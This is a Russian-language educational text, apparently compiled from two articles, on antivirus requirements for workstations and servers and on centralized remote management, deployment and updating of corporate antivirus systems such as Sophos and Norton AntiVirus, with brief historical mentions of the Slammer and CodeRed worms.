Данные параметры позволяют определить группы компьютеров и домены, подвергаемые сканированию. Антивирусная защита компьютерной сети предприятия (офиса) Настройка сервера антивирусной защиты

На основании приведенных выше рассуждений и примеров можно сформулировать основные требования к антивирусам для рабочих станций. Понятно, что эти требования будут отличаться для рабочих станций различных классов.

Требования к антивирусам для рабочих станций Windows

Как и раньше требования будут делиться на несколько категорий:

Общие требования - надежность, производительность, удобство в использовании, дешевизна - нет смысла лишний раз повторяться

Основные требования - как следствие главной задачи:

• Проверка всех файлов на локальных дисках, к которым идет обращение - на чтение, на запись, на запуск - с целью выявления и нейтрализации компьютерных вирусов
• Проверка сменных и сетевых дисков
• Проверка памяти
• Проверка входящих и исходящих писем на предмет наличия вирусов, проверяться должны как сами сообщения, так и вложения к ним
• Проверка скриптов и других активных элементов веб-страниц
• Проверка макросов в документах Microsoft Office и файлах других приложений
• Проверка составных файлов - архивов, самораспаковывающихся архивов, упакованных исполняемых файлов, почтовых баз данных, файлов почтовых форматов, OLE-контейнеров
• Возможность выбора различных действий над зараженными файлами, штатно:
  • блокирование (при проверке в режиме реального времени)
  • запись в журнал (при проверке по требованию)
  • удаление
  • перемещение на карантин
  • лечение
  • запрос действия у пользователя
• Лечение зараженных файлов
• Лечение зараженных файлов в архивах
• Желательно - обнаружение потенциально нежелательных программ (рекламных и шпионских модулей, хакерских утилит, и т. п.)

Требования к управлению

• Наличие локального графического интерфейса
• Возможность удаленного и централизованного управления (корпоративная версия)
• Возможность планирования запуска задач проверки и обновления
• Возможность запуска любых задач или выполнения любых действия по требованию (вручную)
• Возможность ограничения действий непривилегированного пользователя применительно к антивирусному комплексу

Требования к обновлению

• Поддержка различных источников обновления, штатно:
  • HTTP- или FTP-ресурс
  • Локальная или сетевая папка
  • Централизованная система обновления (в корпоративных версиях)
• Возможность обновлять антивирусные базы, антивирусное ядро и модули приложения
• Возможность выполнять обновления вручную по требованию или автоматически по расписанию
• Возможность выполнять откат обновления антивирусных баз

Требования к диагностике

• Уведомление локального пользователя о важных событиях - обнаружение вирусов, смена состояния антивируса и т. д.
• Ведение журналов работы антивируса и/или отдельных задач
• Уведомление администратора антивирусной безопасности (в корпоративной версии)

Требования к антивирусам для рабочих станций Linux/Unix

Общие требования - практически без изменений: надежность, производительность, дешевизна. Удобство использования в Unix-системах традиционно оценивается по несколько другим критериям, чем в Windows-системах, хотя такое положение дел и начинает постепенно меняться в сторону унификации требований

Основные требования - исходя из назначения:

• Проверка по требованию произвольных файлов и каталогов на предмет наличия вирусов
• Желательно, но не критично - проверка определенных каталогов в режиме реального времени при доступе к файлам. Если такой функционал действительно необходим, значит речь идет не столько о рабочей станции, сколько о сервере - в Unix-системах явного различия между ними нет
• Обнаружение вирусов в составных объектах - архивах, самораспаковывающихся архивах, упакованных исполняемых модулях, постовых базах данных, файлах почтовых форматов, OLE-контейнерах - не ограничиваясь форматами, распространенными в Unix-среде
• Возможность выбора действия при обнаружении зараженных файлов, штатно:
  • удалять
  • перемещать или переименовывать
  • лечить
  • записывать информацию в отчет
  • запросить действие у пользователя (при проверке по требованию)
• Лечение инфицированных файлов
• Желательно - возможность лечения в архивах

Требования к управлению

• Локальное управление при помощи редактирования конфигурационных файлов
• Желательно - удаленное управление через веб-интерфейс
• Возможность планировать запуск задач и выполнение действий
• Возможность выполнять задачи и действия вручную

Требования к диагностике

• Ведение журналов работы
• Уведомление администратора антивирусной безопасности

Защита серверов

В целом антивирусная защита серверов не так сильно отличается от защиты рабочих станций, как, например, от защиты шлюзов. Основные угрозы и технологии противодействия им остаются теми же - смещаются только акценты.

Сетевые сервера как и рабочие станции естественным образом делятся на классы, согласно используемым операционным системам:

• Сервера Windows
• Сервера Novell Netware
• Сервера Unix

Принцип деления обусловлен характерными для различных операционных систем вирусными угрозами и, как следствие, различными вариантами в определении основной задачи антивируса.

В случае продуктов для защиты серверов деление на персональные и сетевые продукты отсутствует - все продукты являются сетевыми (корпоративными). У многих производителей вообще нет деления корпоративных продуктов на предназначенные для рабочих станций и файловых серверов - имеется единый продукт.

Специфические угрозы и способы противодействия

Все относящиеся к серверам специфические угрозы связаны не столько с особенностями серверных операционных систем, сколько с применением уязвимого ПО, характерного для серверов.

Сервера Microsoft Windows

Для серверов Windows актуальны все те же угрозы, что и для рабочих станций под Windows NT/2000/XP. Отличия заключаются только в преимущественном способе эксплуатации серверов, что выражается в ряде дополнительных атак, нехарактерных для рабочих станций.

Так, за серверами Windows редко непосредственно работают пользователи, а значит, почтовые клиенты и офисные приложения на серверах, как правило, не используются. Как следствие, требования к защите почты на уровне почтового клиента и дополнительные средства обнаружения макровирусов в случае серверов Windows менее востребованы.

Пример . Антивирус Касперского для Windows File Servers в отличие от Антивируса Касперского для Windows Workstations лишен модуля поведенческого анализа выполняемых макросов при работе с документами Microsoft Office и модуля проверки получаемой и отправляемой почты. Это не значит, что в продукте отсутствует защита от макровирусов и почтовых червей - как уже отмечалось, в конечном счете, все открываемые файлы проверяются модулем постоянной защиты файловой системы - просто специфика эксплуатации серверов не требует дополнительных средств защиты, как это было в случае с рабочими станциями.

С другой стороны на серверах Windows значительно чаще, чем на рабочих станциях могут использоваться такие службы как Microsoft SQL Server и Microsoft IIS. Как и сами операционные системы производства Microsoft (и не только Microsoft), эти службы могут содержать уязвимости, чем в свое время неоднократно пользовались авторы вирусов.

Пример . В 2003 году появился и буквально пронесся по Интернету червь Net- Worm .Win32.Slammer, использовавший уязвимость в Microsoft SQL Server 2000. Slammer не сохранял свои файлы на диск, а выполнялся непосредственно в адресном пространстве приложения SQL Server. После этого в бесконечном цикле червь выполнял атаку на случайные IP-адреса в сети, пытаясь использовать для проникновения ту же уязвимость. В результате активности червя были до такой степени перегружены сервера и каналы связи Интернет, что целые сегменты сети были недоступны. Особенно пострадала от эпидемии Южная Корея. Стоит отметить, что никаких других действий, кроме размножения червь не выполнял.

Пример . Еще раньше, в 2001 году, уязвимость в Microsoft IIS 5.0 была использована для распространения червем Net- Worm .Win32. CodeRed .a. Последствия эпидемии были не столь внушительны, как в случае с червем Slammer, но зато при помощи компьютеров, зараженных CodeRed .a, была произведена небезуспешная попытка DDoS атаки на сайт Белого Дома США (www.whitehouse.gov). CodeRed .a также не сохранял файлы на дисках пораженных серверов.

Особенность обоих червей в том, что модуль проверки файловой системы (хоть по запросу, хоть при доступе) против них бессилен. Эти черви не сохраняют свои копии на диск и вообще никак не проявляют своего присутствия в системе, кроме повышенной сетевой активности. На сегодняшний день основной рекомендацией по защите является своевременная установка патчей на операционную систему и используемое ПО. Другой подход заключается в настройке брандмауэров таким образом, чтобы порты, используемые уязвимыми службами были недоступны извне - разумное требование в случае защиты от Slammer, но неприемлемое для защиты от CodeRed .

Актуальными для серверов Windows остаются и черви, атакующие уже непосредственно уязвимые службы операционной системы, такие как Lovesan, Sasser, Mytob и др. Защита от них должна обеспечиваться комплексными мерами - использованием брандмауэров, установкой заплат, применением проверки при доступе (упомянутые черви при успешной атаке сохраняют свои файлы на жестком диске).

Учитывая характер атак, можно сделать вывод, что основными средствами защиты серверов Windows являются: модуль проверки файлов при доступе, модуль проверки файлов по требованию, модуль проверки скриптов, а основными технологиями - сигнатурный и эвристический анализ (а также поведенческий - в модуле проверки скриптов).

Сервера Novell Netware

Специфических вирусов, способных заражать Novell Netware, нет. Существует, правда, несколько троянов , ворующих права доступа к серверам Novell, но они все равно рассчитаны на выполнение в среде ОС Windows.

Соответственно, антивирус для сервера Novell Netware фактически не предназначен для защиты этого сервера. В чем же тогда его функции? В предотвращении распространения вирусов. Сервера Novell Netware в большинстве своем используются именно как файловые сервера, пользователи Windows-компьютеров могут хранить на таких серверах свои файлы или же запускать программы, расположенные на томах Novell Netware. Чтобы предотвратить проникновение вирусов на общие ресурсы сервера Novell, либо запуск/чтение вирусов с таких ресурсов и нужен антивирус.

Соответственно, основные средства, применяемые в антивирусе для Novell Netware - проверка при доступе и проверка по требованию.

Из специфических технологий, применяемых в антивирусах для Novell Netware необходимо отметить блокирование станций и/или пользователей, записывающих на сервер вредоносные программы.

Сервера Unix

Про сервера Unix можно сказать все то же, что и про сервера Novell Netware. Антивирус для Unix-серверов решает не столько задачу защиты самих серверов от заражения, сколько задачу недопущения распространения вирусов через сервер. Для этого применяются все те же два основных средства:

• Проверка файлов по требованию
• Проверка файлов при доступе

Пример . Антивирус Касперского для Unix/Linux File Servers включает модуль проверки при доступе, тогда как в Антивирусе Касперского для Linux Workstations такого модуля нет. Связано это с различными функциями рабочих станций и серверов Linux - в сети построенной исключительно (или большей частью) на Linux-станциях опасность заражения вирусами практически отсутствует, и поэтому острой необходимости в модуле, контролирующем все файловые операции, нет. Напротив, если Linux-компьютер активно используется для хранения и передачи файлов (особенно в Windows-сети), то он является, по сути, сервером и требует средств постоянного контроля файлов.

Многие известные черви под Linux используют для распространения уязвимости не в самой операционной системе, а в системном и прикладном ПО - в ftp-сервере wu- ftpd , в веб-сервере Apache. Понятно, что такие приложения используются чаще на серверах, чем на рабочих станция, что является дополнительным аргументом в пользу усиленных мер по защите серверов.

В отличие от серверов Novell, где поддержка сетей Microsoft является встроенной функцией, сервера Unix по умолчанию не приспособлены для передачи файлов по протоколу SMB/ CIFS . Для этой цели используется специальный программный пакет - Samba, позволяющий создавать совместимые с Microsoft-сетями общие ресурсы.

Если обмен файлами происходит только по протоколам SMB/ CIFS , то очевидно, не имеет смысла контролировать все файловые операции, достаточно проверять только файлы, передающиеся с использованием Samba-сервера.

Пример . В линейке продуктов Лаборатории Касперского есть специальное решение - Антивирус Касперского для Samba Server, предназначенное именно для защиты общих папок, созданных на Unix-серверах при помощи ПО Samba. В составе этого продукта нет модуля, контролирующего файловые операции, вместо него используется фильтр, встраиваемый в Samba и перехватывающий все передаваемые файлы.

(С) Александр Фролов, 2001
[email protected], http://www.frolov.pp.ru, http://www.datarecovery.ru

Целью статьи является описание наиболее современных средств удаленного управления и контроля в антивирусных системах, предназначенных для использования в средних и крупных компаниях, насчитывающих десятки и сотни серверов, а также сотни и тысячи рабочих станций. Были исследованы средства удаленного управления и контроля антивирусных программ Sophos, Norton AntiVirus, Mcafee NetShield, Trend Virus Control System и других.

1. Необходимость в удаленном управлении и контроле

Централизованное удаленное управление антивирусными программами и контроль их работы для средних и крупных компаний необходим для соблюдения технологии антивирусной защиты во всей корпоративной сети.

Выполнение в "ручном" режиме таких операций, как отслеживание обновлений антивирусной базы данных и загрузочных модулей антивирусных программ, контроль эффективности обнаружения вирусов на рабочих станциях и серверах и т.п., малоэффективно, если в сети имеется большое количество пользователей или если сеть состоит из территориально удаленных друг от друга сегментов.

Если же не обеспечить своевременное и эффективное выполнение перечисленных выше операций, технология антивирусной защиты корпоративной сети обязательно будет нарушена, что рано или поздно приведет к вирусному заражению. Например, пользователи могут неправильно настроить автоматическое обновление антивирусной базы данных или просто выключать свои компьютеры в то время, когда такое обновление выполняется. В результате автоматическое обновление не будет выполнено и возникнет потенциальная угроза заражения новыми вирусами.

Так как услуги квалифицированного системного администратора стоят достаточно дорого, даже крупные компании имеют в своем штате всего несколько таких сотрудников. Без наличия специальных централизованных систем управления и контроля работы антивирусных программ они будут физически не в состоянии гарантировать соблюдение технологии антивирусной защиты на сотнях и тысячах компьютеров корпоративной сети.

В то же время системы удаленного управления и администрирования могут выполнить обновление антивирусных баз данных и загрузочных антивирусов более чем на 1000 компьютеров за 10 минут (здесь приведены данные для антивируса Sophos).

Другая причина, по которой возникает необходимость в системах удаленного управления и контроля работы антивирусов - "ленивые" пользователи.

Как правило, пользователи полностью заняты своей работой и не имеют ни желания, ни возможности отвлекаться на выполнение системных работ. В частности, установка и настройка антивирусов, запуск сканирования или обновление антивирусных баз данных рассматривается пользователями как обязанность системных администраторов или других технических служб. Полагая, что системный администратор справляется со своей работой, пользователи нередко полностью игнорируют требования инструкций по соблюдению антивирусной безопасности или даже не читают их вовсе.

В этих условиях системы антивирусной защиты должны относиться к пользователям дружественно, выполняя все необходимые операции автоматически и незаметно для пользователя. Это относится не только к сканированию файлов, но и таким функциям, как установка, настройка и обновление антивирусов.

При этом системный администратор должен дистанционно устанавливать и обновлять антивирусное программное обеспечение, а также контролировать состояние антивирусной защиты на любых рабочих станциях и серверах сети, пользуясь для этого своей рабочей станцией. Этот принцип положен в основу всех современных корпоративных систем антивирусной защиты.

2. Функции удаленного управления и контроля

В этом разделе мы рассмотрим функции удаленного управления и контроля, реализованные в современных антивирусных системах. Вот перечень таких функций:

• удаленная установка и обновление антивирусных программ;
• удаленное обновление антивирусных баз данных;
• создание и копирование на серверы сети дистрибутивов для централизованной установки антивирусов;
• удаленная настройка антивирусных программ, установленных на рабочие станции и серверы;
• автоматическое обнаружение новых рабочих станций, подключенных к корпоративной сети, с последующей автоматической установкой на эти станции антивирусных программ;
• планирование заданий для немедленного или отложенного запуска (таких как обновление программ, антивирусной базы данных, сканирование файлов и т.п.) на любых компьютерах сети;
• отображение в реальном времени процесса работы антивирусов на рабочих станциях и серверах сети

Расскажем об этом подробнее.

Удаленная установка и обновление антивирусных программ

Установка антивирусной программы, выполняемая вручную, обычно сводится к запуску программы установки и выполняется под управлением интерактивного мастера установки. При этом в диалоговых окнах мастера требуется выбрать локальный диск и каталог, в который будет установлена программа, а также задать параметры и режимы работы программы.

Проблемы с пользователями

Несмотря на простоту выполнения этой операции для рабочих станций, в корпоративных сетях обычно она выполняется системным администратором или техническим персоналом. Так как большинство пользователей имеют лишь отдаленное представление о технологиях антивирусной защиты или не имеют об этом вообще никакого представления (и не обязаны иметь!), системные администраторы не доверяют им выполнение этой операции. Что же касается установки антивирусов на сервер, то это делает только системный администратор.

Отсутствие необходимого уровня доступа к системным ресурсам

Если на рабочей станции пользователя установлены операционные системы Microsoft Windows NT/2000, то путем соответствующей настройки политики доступа хороший системный администратор вообще запрещает пользователям устанавливать какие-либо программы самостоятельно. Тем более, он запрещает подключаться к локальному домену с правами системного администратора. В этом случае пользователь не имеет физической возможности установить и настроить антивирус самостоятельно.

Проблемы в удаленных филиалах компании

Другая проблема с ручной установкой антивирусных программ возникает в удаленных филиалах компаний, зачастую не имеющих в своем штате системного администратора. Администратор приезжает в такие филиалы эпизодически, когда в этом возникает необходимость. При этом сотрудники, работающие в удаленном филиале, обычно не имеют доступа к ресурсам, необходимым для установки антивирусов на сервер и рабочие станции локальной сети филиала.

Слишком большие временные затраты

Даже если администратор или технический персонал может обойти все рабочие станции корпоративной сети с целью ручной установки антивирусов, на это может уйти слишком много времени - ведь к сети компании могут быть подключены сотни и тысячи компьютеров. Кроме того, компьютеры ремонтируют, заменяют установленное на них программное обеспечение и выполняют другие операции, после которых требуется повторная установка антивирусов.

Удаленная автоматическая установка антивирусов Sophos

Таким образом, антивирусная система, претендующая на использование в корпоративном секторе рынка, должна допускать удаленную установку на все компьютеры корпоративной сети с единственной рабочей станции системного администратора.

Например, с помощью утилиты SAVAdmin антивирусной системы Sophos администратор может создать дистрибутивные каталоги централизованной установки Central Installation Directories (CID), разместив их на некоторых серверах корпоративной сети. Например, можно создать такой каталог в центральном офисе и по одному каталогу на каждый удаленный отдел компании.

Администратор может настроить репликацию между различными каталогами CID, которая будет выполняться автоматически. При этом ему не придется самостоятельно обновлять все каталоги CID - можно заменить дистрибутивные файлы антивирусной системы только в главном каталоге. Содержимое других каталогов (например, расположенных в удаленных филиалах) обновится автоматически, а вместе с ним обновятся антивирусы и на всех рабочих станциях соответствующих локальных сетей филиалов.

Далее администратор с консоли SAVAdmin запускает удаленную установку антивирусов из каталогов CID на выбранные рабочие станции, группы рабочих станций или домены. При изменении содержимого CID выполняется автоматическое обновление всех антивирусов сети. Администратор может проконтролировать процесс обновления версий антивирусных программ.

Чтобы ускорить процесс установки и обновления антивирусных программ, компания Sophos разработала технологию "minimal push and full pull". Эта технология предполагает параллельное выполнение установки и обновления версий антивирусов. При этом обновление сети, состоящей более чем из 1000 компьютеров, выполняется за 10 минут.

Рассмотрим процедуру централизованной установки более подробно.

Создание главного каталога централизованной установки

На первом этапе администратор со своей рабочей станции формирует главный каталог централизованной установки. Этот каталог обычно располагается на одном из серверов локальной сети центрального офиса компании (рис. 1-1).

Создание главного каталога централизованной установки и формирование его содержимого выполняется автоматически программой начальной установки, запускаемой администратором со своей рабочей станции.

Рис. 1-1. Копирование файлов в главный каталог централизованной установки

Репликация главного каталога централизованной установки

Если корпоративная сеть объединяет территориально удаленные друг от друга филиалы, соединенные относительно медленными каналами связи, для существенного ускорения установки антивирусов на серверы и рабочие станции филиалов администратор может создать на серверах филиалов каталоги централизованной установки (рис. 1-2).

Создание и наполнение этих каталогов выполняется под управлением программы начальной установки, запущенной на рабочей станции администратора. При этом администратор может указать параметры автоматической репликации содержимого главного каталога централизованной установки и других каталогов централизованной установки. При обновлении содержимого главного каталога содержимое других каталогов централизованной установки будет обновляться автоматически в соответствии с расписанием, определенным администратором.

Рис. 1-2. Репликация файлов главного каталога централизованной установки в другие каталоги централизованной установки

Установка антивирусов на все рабочие станции и серверы

После формирования всех каталогов централизованной установки запускается процесс инсталляции антивирусов на рабочие станции и серверы сети. Установка выполняется одновременно на все компьютеры, причем в каждой локальной сети для этого используется свой каталог централизованной установки (рис. 1-3).

График установки задается администратором. Так как установка выполняется в каждом филиале из своего каталога, этот процесс не вызывает перегрузки каналов связи, соединяющих локальные сети филиалов.

Удаленное обновление антивирусных баз данных

Актуальность своевременного обновления антивирусных баз данных для обнаружения новых вирусов ни у кого не вызывает сомнений, однако в средних и крупных компаниях выполнение этой процедуры имеет ряд особенностей.

Разработка расписания выполнения обновлений

Прежде всего, возникают трудности с разработкой расписания автоматического обновления антивирусной базы данных.

Как известно, большинство антивирусных программ предусматривает автоматическое обновление антивирусных баз данных по расписанию, например, в заданные часы и дни недели. При этом для успешного завершения обновления в момент запуска процедуры компьютер должен быть включен и подсоединен к локальной интрасети компании или к Интернету.

Иногда системные администраторы настраивают расписание обновления так, чтобы запуск загрузки новой антивирусной базы данных выполнялся в обеденное время. Но если компьютер используется для сменной работы, время обновления выбрать не всегда просто.

Рис. 1-3. Одновременная установка на все рабочие станции и серверы корпоративной сети из каталогов централизованной установки

Проблемы с настройкой расписания пользователями

Это связано, с одной стороны, с недостаточной квалификацией пользователей и нежеланием выполнять какие-либо системные работы, не имеющие прямого отношения к производственным обязанностям, а с другой стороны - с отсутствием уровня доступа к ресурсам системы, необходимого для выполнения настройки. Как мы уже говорили выше, администраторы часто настраивают системные политики таким образом, чтобы обычный пользователь не мог самостоятельно устанавливать системные программы или изменять их настройки.

Централизованное обновление антивирусных баз данных

Современные антивирусные системы допускают автоматическое централизованное управление процессом обновления антивирусных баз данных, а также предоставляют в распоряжение администратора все необходимые средства для дистанционного контроля обновления.

Управляющая консоль администратора позволяет не только проконтролировать обновление, но и при необходимости запустить принудительное обновление для любой рабочей станции, группы пользователей или домена.

Обновление выполняется по такой же схеме, что и первоначальная установка.

Вначале администратор записывает файлы обновления в главный каталог централизованной установки (рис. 1-1). Далее содержимое этого каталога реплицируется на другие каталоги централизованной установки (рис. 1-2). И, наконец, на последнем этапе выполняется обновление антивирусных баз данных серверов и рабочих станций из соответствующих каталогов централизованной установки (рис. 1-3).

Если корпоративная сеть подключена к Интернету, обновление содержимого главного каталога централизованной установки может выполняться автоматически с сервера антивирусной компании. Расписание такого обновления может быть задано администратором корпоративной сети.

Конфигурация антивирусной программы после установки

После выполнения установки может быть выбрана некая стандартная конфигурация антивируса, например, предусматривающая антивирусную проверку файлов при любом обращении к ним, а также создание отчета результатов сканирования.

При необходимости средства удаленного управления и контроля позволяют назначить другую конфигурацию антивируса, заданную при помощи механизма шаблонов. Администратор может подготовить несколько таких шаблонов, определяющих режимы работы антивирусов для разных рабочих станций, групп пользователей или доменов.

Удаленная настройка антивирусных программ

Известно, что от того, насколько правильно выполнены настройки антивирусной программы, зависит эффективность ее использования. Отказавшись, например, ради ускорения работы от проверки всех файлов, не имеющих расширение имени com или exe, пользователь рискует заразить свой компьютер макрокомандными вирусами, распространяющимися через файлы офисных документов.

Обычно дальновидные администраторы не доверяют пользователям настройку параметров антивирусных программ, особенно имеющих отношение к режимам сканирования файлов. При этом им приходится выполнять эту работу самостоятельно.

Заметим, что в крупных интрасетях корпораций иногда приходится использовать разные настройки для разных пользователей, групп пользователей или доменов. Все это усложняет ручную настройку параметров антивирусов.

Современные антивирусные системы допускают централизованную дистанционную настройку всех параметров работы антивирусных программ (режимы работы сканера, график обновления антивирусной базы данных, действия над зараженными файлами и т.п.). Данная операция может быть выполнена системным администратором со своей рабочей станции, причем администратор может применять разные схемы настроек для разных пользователей, групп пользователей и доменов.

Обнаружение новых рабочих станций

Интрасеть крупной компании живет своей жизнью. Время от времени в ней возникают такие события, как подключение новых рабочих станций, ремонт или замена старых рабочих станций и т.п.

Вместе с тем все изменения конфигурации рабочих станций в сети требуют своевременного обновления конфигураций антивирусных средств. Однако один системный администратор не в состоянии отследить все изменения в сети, насчитывающей сотни и тысячи компьютеров. Поэтому современные антивирусные системы дополнены средствами автоматизированного исследования конфигурации сети на предмет появления в ней новых станций или замены старых.

При обнаружении изменений в конфигурации сети система управления и контроля выполняет автоматическую установку антивирусных программ или, при необходимости, автоматическое обновление программных модулей антивируса, а также антивирусной базы данных. В результате после установки рабочей станции, после ее ремонта или замены произойдет автоматическая установка на ее диск антивирусной программы безо всякого участия администратора или пользователя.

Планирование заданий

Система централизованного удаленного управления и контроля позволяет планировать выполнение заданий для отдельных компьютеров корпоративной сети, для выбранных групп пользователей или доменов, а также контролировать ход и результат выполнения запущенных заданий.

Выбор расписания

Планирование позволяет определить периодичность выполнения различных процедур по различным расписаниям:

• ежечасно;
• ежедневно;
• еженедельно;
• по определенным дням недели или месяцам;
• в следующий час, день недели или месяц;
• однократное выполнение в заданное время;
• немедленное однократное выполнение процедуры

Список планируемых процедур

Вот список процедур, выполнение которых можно запланировать в современных антивирусных системах:

• создание детального отчета о конфигурации аппаратных и программных средств рабочей станции;
• определение номера версии антивирусной программы, а также даты создания и номера версии антивирусной базы данных;
• установка антивирусной программы на выбранный компьютер, на компьютеры группы пользователей или домена;
• обновление содержимого дистрибутивного каталога централизованной установки антивирусных программ;
• изменение пути к дистрибутивному каталогу централизованной установки антивирусных программ;
• изменение учетной записи (идентификатор/пароль), используемой для обновления антивирусной программы и антивирусной базы данных;
• обнаружение изменений в конфигурации сети (поиск новых или обновленных рабочих станций) с целью выполнения автоматической установки на новые компьютеры антивирусных программ;
• репликация главного дистрибутивного каталога централизованной установки антивирусных программ в другие каталоги (например, расположенные на серверах, установленных в филиалах компании). Эта процедура применяется для рассылки нового или обновленного дистрибутива на несколько серверов, предназначенных для централизованной установки антивирусных программ

Управляющая система позволяет определить выполнение произвольных команд операционной системы до начала выполнения задания, а также после его выполнения.

Можно также определить действия, выполняемые при аварийном завершении задания. Например, можно повторить установку антивирусной программы, если она по каким-то причинам не была успешно выполнена.

Запуск и остановка задания

В любой момент времени администратор может запустить или остановить заданную процедуру, воспользовавшись управляющей консолью.

Редактирование задания

Подготовленное, но еще не запущенное задание может быть отредактировано. При этом администратор может изменить расписание выполняемого задания, тип задания и другие его атрибуты.

Удаление задания

Если задание находится в очереди для выполнения или запущено, администратор может его удалить. Работающее задание при этом останавливается.

Контроль выполнения задания

Запланированному заданию обычно присваивается имя и тип. Тип определяет выполняемые действия, а имя используется администратором для отслеживания результата выполнения этого задания. Такое отслеживание может выполняться непрерывно в реальном времени.

Развитые средства сортировки позволяют отслеживать только нужные группы заданий, например:

• задания определенного типа;
• задания, запущенные на выбранных рабочих станциях;
• задания, запущенные на рабочих станциях группы пользователей;
• задания, запущенные на рабочих станциях выбранного домена

Результаты выполнения заданий протоколируются в журнале.

Параметры заданий

При помощи консоли удаленного управления и контроля администратор может задать различные параметры планируемых заданий.

Общие параметры

Ниже мы перечислили общие параметры заданий:

• имя задания;
• имя файла для протоколирования результатов выполнения задания;
• команды, выполняемые до и после завершения задания;
• флажок перманентности задания. Перманентные задания, в отличие от временных заданий, восстанавливаются при повторном запуске управляющей консоли;
• флажок выполнения задания для всех компьютеров заданной группы;
• флажок автоматического повтора задания при его неудачном завершении

Целевые параметры

Эти параметры определяют рабочие станции, группы пользователей и домены, для которых выполняется задание. Фактически это просто список компьютеров, групп пользователей или доменов, сформированный администратором.

Дополнительные параметры установки

К этой группе относятся параметры, влияющие на параметры установки антивирусных программ, имеющие отношение к сканированию сети на предмет наличия установленных копий антивируса. Можно указать, что установка должна выполняться только на те рабочие станции, которые:

• не содержат установленной копии антивируса;
• содержат устаревшую копию антивируса;
• либо не содержат установленной копии антивируса, либо содержат устаревшую копию антивируса

Предусмотрена возможность выполнения принудительного повторного обновления ранее обновленных копий антивирусных программ.

Параметры конфигурации антивируса

При помощи этих параметров можно указать файл, содержащий шаблон настроек конфигурации антивирусной программы. Для каждого такого шаблона можно также указать имя.

Напомним, что шаблоны позволяют сохранять различные наборы параметров настройки антивирусной программы для разных рабочих станций, групп пользователей или доменов.

Расположение главного каталога централизованной установки

Данная группа параметров определяет физическое расположение главного каталога централизованной установки антивирусных программ. Данный каталог может реплицироваться на другие каталоги, расположенные, например, на дисках удаленных серверов филиалов компании.

Расположение каталога для установки антивирусов на рабочие станции

Администратор имеет возможность указать путь к каталогу рабочей станции, в который необходимо выполнить установку антивирусной программы.

Может быть выбран каталог по умолчанию или каталог, специфический для данной конфигурации.

Учетная запись для установки и обновления антивируса

Данный набор параметров позволяет задать учетную запись (идентификатор, пароль и домен), с использованием которой рабочая станция будет выполнять обновление антивирусной программы и антивирусной базы данных. Эта учетная запись не обязана иметь административные привилегии.

Параметры изменения текущего каталога централизованной установки

Эти параметры позволяют создать либо зарегистрированный совместно используемый каталог централизованной установки, содержащий сразу несколько дистрибутивов различных антивирусных программ, либо отдельные произвольные каталоги для каждой антивирусной программы.

Параметры репликации каталогов централизованной установки

Эти параметры позволяют выбрать каталоги, вовлеченные в репликацию, а также указать, следует ли перед репликацией удалять старые дистрибутивные файлы.

Можно задать также режим частичной репликации, при которой реплицируются только файлы антивирусной базы данных и самые важный программные файлы. Такой режим особенно удобен в тех случаях, когда репликация выполняется по медленным каналам связи (например, модемным).

Параметры сканирования сети с целью обнаружения новых компьютеров

Такое сканирование выполняется для автоматической установки на новые компьютеры антивирусных программ.

Данные параметры позволяют определить группы компьютеров и домены, подвергаемые сканированию.

Параметры отчета

Эти параметры позволяют задать имя файла, в котором будет сохранен отчет, а также команду, выполняемую после генерации отчета. Эта команда может, например, загрузить созданный отчет в Microsoft Excel.

3. Параметры программы контроля и управления

Классические системы контроля и управления состоят из управляющей программы, запускаемой на рабочей станции администратора, и программ-агентов, запущенных на рабочих станциях и серверах сети.

Параметры программы контроля и управления влияют на режимы работы самой программы и агентов. Изменяя эти параметры, администратор может выбрать необходимый сетевой протокол, с применением которого консоль взаимодействует с агентами, а также настроить параметры выбранного сетевого протокола.

Конфигурирование программы контроля и управления

Эти параметры позволяют задать:

• режим отображения списка всех компьютеров сети (автоматическое или по явному запросу);
• количество потоков исполнения (threads) для обновления информации о состоянии сети;
• количество попыток извлечения данных из удаленных компьютеров (необходимо при неустойчивой работе каналов связи);
• расположение централизованного файла журнала, хранящего события, связанные с работой антивирусной защиты на всех компьютерах корпоративной сети;
• параметры учетных записей администраторов, используемых для управления работой антивирусной защиты (идентификатор, пароль, домен и т.п.).

Конфигурирование программ-агентов

Программы-агенты запускаются на рабочих станциях и осуществляют взаимодействие с управляющей программой. Для агентов настраиваются следующие параметры:

• сетевой протокол, применяемый для взаимодействия с управляющей программой (TCP/IP, IPX/SPX, NetBIOS over TCP, NetBIOS over IPX, Named pipes и т.д.);
• конечная точка (endpoint);
• номер порта

4. Архитектура и принципы работы корпоративных систем антивирусной защиты

Рассмотрев назначение и функции систем управления и контроля антивирусных средств защиты, перейдем к обзору архитектурных решений, применяемых в современных корпоративных антивирусах. Это классические клиент-серверные архитектуры, а также многоуровневые архитектуры, предполагающие применение Web-технологий.

Системы клиент-сервер

При использовании клиент-серверной архитектуры основой системы управления и контроля является антивирусный сервер, установленный на одном из серверов корпоративной сети. С ним взаимодействуют, с одной стороны, программы-агенты, установленные вместе с антивирусами на рабочих станциях сети, а с другой стороны - управляющая консоль администратора антивирусной защиты (рис. 4-1).

Рис. 4-1. Взаимодействие консоли администратора, агентов и антивирусного сервера

Антивирусный сервер выполняет управляющие и координирующие действия. В частности, он хранит общий журнал событий, имеющих отношение к антивирусной защите и возникающих на всех компьютерах сети, список и расписание выполнения заданий. Антивирусный сервер отвечает за прием от агентов и передачу администратору антивирусной защиты сообщений о возникновении тех или иных событий в сети, выполняет периодическую проверку конфигурации сети с целью обнаружения новых рабочих станций или рабочих станций с изменившейся конфигурацией антивирусных средств и т.д.

Помимо агентов, на каждой рабочей станции и сервере корпоративной сети устанавливается антивирус, выполняющий сканирование файлов и проверку файлов при их открытии (функции сканера и антивирусного монитора). Результаты работы антивируса передаются через агентов антивирусному серверу, которых их анализирует и протоколирует в общем журнале событий.

Управляющая консоль администратора предоставляет возможность управления всей системой антивирусной защиты и контроля ее функционирования. Она взаимодействует через агентов с антивирусным сервером, а также с антивирусами, установленными на всех компьютерах сети.

Эта управляющая консоль может представлять собой стандартное приложение Microsoft Windows с оконным интерфейсом, или аплет (snap-in) управляющей консоли Control Panel операционной системы Microsoft Windows. Первый подход реализован, например, а управляющей системе антивирусов Sophos, а второй - в управляющей системе Norton AntiVirus.

Пользовательский интерфейс управляющей консоли позволяет просматривать древовидную структуру корпоративной сети, получая при необходимости доступ к отдельным компьютерам тех или иных групп пользователей или доменов (рис. 4-2).

Рис. 4-2. Управляющая консоль администратора антивирусной защиты

